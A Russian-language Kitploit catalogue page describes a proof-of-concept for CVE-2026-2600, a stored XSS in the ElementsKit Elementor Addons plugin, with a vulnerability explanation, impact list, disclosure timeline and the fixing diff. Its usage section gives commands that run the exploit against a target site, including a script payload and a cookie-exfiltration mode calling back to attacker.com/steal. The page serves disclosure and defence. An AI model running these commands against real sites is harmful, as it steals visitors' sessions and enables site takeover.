Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-2600-POC — Доказательство концепции эксплуатации для CVE-2026-2600, хранимой XSS в ElementsKit Elementor Addons <= 3.7.9, позволяющей аутентифицированным авторам (Contributors) внедрять произвольные скрипты через специально сформированные данные Elementor. | Kitploit
Инструменты/GitHubGitHub/folks-iwd/cve-2026-2600-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

Доказательство концепции эксплуатации для CVE-2026-2600, хранимой XSS в ElementsKit Elementor Addons <= 3.7.9, позволяющей аутентифицированным авторам (Contributors) внедрять произвольные скрипты через специально сформированные данные Elementor.

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — Аутентифицированный (Contributor+) межсайтовый скриптинг с сохранением (Stored XSS)

CVSS6.4 MEDIUM
Затронуто<= 3.7.9
Исправлено3.8.0
Мин. рольContributor (edit_posts)
ВекторСеть / Низкая сложность / Низкие привилегии

Уязвимость

Виджет Simple Tab выводит заголовки вкладок с помощью echo без экранирования вывода. В widgets/tab/tab.php цикл рендеринга выглядит так:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

Редактор Elementor санирует ввод на стороне клиента, но конечная точка REST API (/wp-json/wp/v2/posts/{id}) принимает мета-поле _elementor_data напрямую и полностью обходит этот уровень защиты.

Аутентифицированный Contributor может отправить PATCH-запрос к записи с подделанным JSON-пейлоадом Elementor, который задаёт ekit_tab_title как произвольный HTML. Поскольку значение сохраняется дословно в _elementor_data и выводится без esc_html() во время рендеринга, скрипт выполняется в браузере каждого посетителя при загрузке страницы.

Воздействие

Любой Contributor может:

  • Похищать cookie сессий и токены аутентификации всех посетителей сайта, включая администраторов
  • Захватывать учётные записи администраторов и получать полный контроль над сайтом
  • Незаметно разворачивать кейлоггеры или оверлеи для сбора учётных данных
  • Перенаправлять посетителей на фишинговые страницы или сайты распространения вредоносного ПО
  • Постоянно портить страницы — пейлоад сохраняется до тех пор, пока его не удалят вручную

На момент раскрытия уязвимости было затронуто более 400 000 активных установок.

Использование

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

Скрипт аутентифицируется по HTTP, получает REST nonce из админ-редактора, создаёт черновик записи, патчит _elementor_data с XSS-пейлоадом, встроенным в поле ekit_tab_title, и публикует запись. Вывод подтверждает, активен ли пейлоад в исходном коде страницы.

root@kitploit:~
# Пользовательский пейлоад
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# Эксфильтрация cookie с колбэком
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Интерактивный консольный режим
python3 console_poc.py

Полное описание

https://folks-iwd.github.io/writeups/cve-2026-2600.html

Хронология раскрытия

ДатаСобытие
Январь 2026Обнаружено при анализе диффов SVN. PoC подтверждён.
Январь 2026Сообщено в Patchstack Alliance с полным описанием и PoC.
Март 2026Wpmet выпустил исправление в v3.8.0.
Апрель 2026Опубликован CVE-2026-2600. Присвоен CVSS 6.4 MEDIUM.

Исправление

Wpmet добавил esc_html() вокруг вывода заголовка вкладки в widgets/tab/tab.php:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
Скачать инструмент